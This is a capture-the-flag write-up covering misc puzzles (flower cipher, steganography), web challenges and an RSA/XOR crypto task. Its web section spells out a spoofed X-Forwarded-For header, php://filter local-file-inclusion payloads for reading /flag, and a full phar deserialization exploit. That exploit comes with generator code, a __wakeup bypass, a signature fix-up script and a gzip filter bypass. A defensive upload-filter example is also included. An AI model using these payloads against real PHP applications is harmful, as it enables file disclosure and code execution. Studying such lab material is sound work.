Misc
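Guess It
Challenge description:
The flag you want is inside the archive.
Decode the archive's file name
The extraction password is a1478520
Then fix the file header of flag.png
This gives
After scanning the QR code: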
❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=
Decode the flower cipher
https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo
This gives the flag
flag{rUsJyNdKhdKuS4VfO7}
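What You Want Is Right Here
Challenge description:
What you want is here
Open it with 010editor
The expression at the top is a definite integral; it evaluates to π
So what is the 6? My guess is 3.1415
Then decode with stegpy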
>python steg.py misc.png -p
Enter password (will not be echoed):
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733d
Convert this hex string to characters
5WslsqIQSBG8c6D2m5/KRwg+6gjm1tr1DQ8UyJUmIZs=
k:luckyone
flag{believe_you_are_lucky}
Web
The Vanished Flag
Challenge description:
The flag is hidden in some file; see whether you can include it.
Visit the page
Guessing it is XFF, add: x-forwarded-for:127.0.0.1
File is NUll
File inclusion vulnerability
?file=/flag
Try another approach
?file=php://filter/read=convert.base64-encode/resource=/flag
That does not work either
What finally worked:
?file=php://filter/convert.iconv.utf-8.utf-7/resource=/flag
df4083ae2869462cad0d002533f6cbf7
unserialize_web
A colleague gave me the source code for a deserialization problem; asking for help online!
These articles gave me the idea
https://blog.csdn.net/qq_53460654/article/details/121889104
https://pankas.top/2022/08/04/php(phar)反序列化漏洞及各種繞過姿勢/#phar反序列化
First, a directory scan turns up /www.tar.gz
Generate the .phar
<?php
// Copy of the challenge's File class, so the serialized metadata matches it.
class File {
    public $val1;
    public $val2;
    public $val3;

    public function __construct() {
        $this->val1 = "val1";
        $this->val2 = "val2";
    }

    // Runs when the object is destroyed; evaluates val3 only if it matches the regex.
    public function __destruct() {
        if ($this->val1 === "file" && $this->val2 === "exists") {
            if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
                eval($this->val3);
            } else {
                echo "Access Denied";
            }
        }
    }

    public function __access() {
        $Var = "Access Denied";
        echo $Var;
    }

    // Runs on unserialize and swaps the two values, which would block __destruct().
    public function __wakeup() {
        $this->val1 = "exists";
        $this->val2 = "file";
        echo "檔案存在";
    }
}

$f = new File();
$f->val1 = "file";
$f->val2 = "exists";
$f->val3 = "system('cat /flag');";

// Writing a phar requires phar.readonly=0 in php.ini.
$p = new Phar("File.phar", 0);
$p->startBuffering();
$p->setMetadata($f);            // the object is stored serialized in the manifest
$p->setStub("GIF89a" . "<?php __HALT_COMPILER();" . "?>");
$p->addFromString("test.txt", "test");
$p->stopBuffering();
?>
To bypass the __wakeup() method, change the property count in the serialized object from 3 to 4
Then fix up the signature
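# -*- coding: utf-8 -*-
from hashlib import sha1

with open('./File.phar', 'rb') as fh:
    f = fh.read()                 # the phar file after its contents were modified
s = f[:-28]                       # the data to be signed
h = f[-8:]                        # the signature type plus the GBMB marker
newf = s + sha1(s).digest() + h   # data + signature + type + GBMB
with open('Filenew.phar', 'wb') as fh:
    fh.write(newf)                # write the new file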
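Analyzing upload.php shows that the source bans the __HALT_COMPILER(); marker. Without this marker the file is not recognized as a phar, but the check can be bypassed with gzip compression.
Then change the extension to .gif and upload the file
Finally, trigger it with the phar protocol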
phar://./upload/Filenew.phar.gif
5740619516574ce288f8f30d3f010e70
But the one I submitted was: f5cc52e28f364ad69c093a9a6dd1c954
The flag is dynamic
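The upload filter described above looked for the marker only in the raw bytes, which is why a gzip-compressed archive passed it. The following is an added example, not code from the challenge or from this write-up: it puts a raw-byte check (a hypothetical stand-in for upload.php's filter) beside a check that inspects every gzip/bzip2 layer. The function names, size cap and sample bytes are assumptions constructed for illustration.

```python
import bz2
import gzip
import zlib

PHAR_MARKER = b"__HALT_COMPILER();"
MAX_UNPACKED = 8 * 1024 * 1024   # assumed cap, limits decompression bombs


def naive_filter(data: bytes) -> bool:
    """Raw-byte check of the kind the write-up describes. True = allowed."""
    return PHAR_MARKER not in data


def hardened_filter(data: bytes, depth: int = 3) -> bool:
    """True = allowed. Checks each gzip/bzip2 layer and fails closed."""
    for _ in range(depth + 1):
        if PHAR_MARKER in data:
            return False
        try:
            if data[:2] == b"\x1f\x8b":        # gzip magic
                data = zlib.decompressobj(wbits=31).decompress(data, MAX_UNPACKED)
            elif data[:3] == b"BZh":           # bzip2 magic
                data = bz2.BZ2Decompressor().decompress(data, MAX_UNPACKED)
            else:
                return True                    # no further layer to unpack
        except (OSError, zlib.error):
            return False                       # corrupt "compressed" upload
    return False                               # nested deeper than we inspect


# Constructed samples: a stub-like byte string, not a working archive.
SAMPLE_STUB = b"GIF89a<?php __HALT_COMPILER(); ?>" + b"\x00" * 64
SAMPLE_GZ = gzip.compress(SAMPLE_STUB)
SAMPLE_BZ2_IN_GZ = gzip.compress(bz2.compress(SAMPLE_STUB))
SAMPLE_IMAGE = b"GIF89a" + b"\x00" * 32

if __name__ == "__main__":
    for name, blob in [("stub", SAMPLE_STUB), ("gzip", SAMPLE_GZ),
                       ("bz2-in-gzip", SAMPLE_BZ2_IN_GZ), ("image", SAMPLE_IMAGE)]:
        print(f"{name:12} naive={naive_filter(blob)} hardened={hardened_filter(blob)}")
```

Content checks like this are a backstop; rejecting phar:// in any user-supplied path passed to file functions removes the trigger itself.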
hackme
The weak credentials are admin:123456
Then it shows
remote ip address is block!
Capturing the request gives
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7LTCfIb4x6M6RRhotbersK1AGKKGUyVHmr0es0bHpw
Changing it to none does not work
A directory scan finds /vendor
Analyze the files inside
You can see https://github.com/firebase/php-jwt
After that I ran out of ideas
mypdf
Download the source code
Crypto
encipher
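Challenge description:
While learning encryption and decryption, Xiao Ming encrypted some important input, but he is only a beginner and cannot decrypt the encrypted data, so he badly needs your help. Below is the information Xiao Ming encrypted: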
from Crypto.Util.number import getPrime, bytes_to_long
from Crypto.Util.strxor import strxor
from Crypto.PublicKey import RSA

def decrypt(c, N, d):
    m = pow(c, d, N)  # rsa_decrypt
    origin = 24  # len(xor_key), the same length as key
    xor_key = m.to_bytes(origin, byteorder='big')
    key = b'Life is like an ocean on'
    msg = strxor(xor_key, key)
    msg = msg.decode()
    return msg

#message = decrypt(ciphertext, N, d)
#print(message)
d = 4885628697024674802233453512637565599092248491488767824821990279922756927662223348312748794983451796542248787267207054348962258716585568185354414099671493917947012747791554070655258925730967322717771647407982984792632771150018212620323323635510053326184087327891569331050475507897640403090397521797022070233
N = 89714050971394259600440975863751229102748301873549839432714703551498380713981264101533375672970154214062583012365073892089644031804109941766201243163398926438698369735588338279544152140859123834763870759757751944228350552806429642516747541162527058800402619575257179607422628877017180197777983487523142664487
c = 67254133265602132458415338912590207677514059205474875492945840960242620760650527587490927820914970400738307536068560894182603885331513473363314148815933001614692570010664750071300871546575845539616570277302220914885734071483970427419582877989670767595897758329863040523037547687185382294469780732905652150451
mm = decrypt(c, N, d)
print(mm)
# flag{1s_Pa33w0rd_1y2u22}
flag{1s_Pa33w0rd_1y2u22}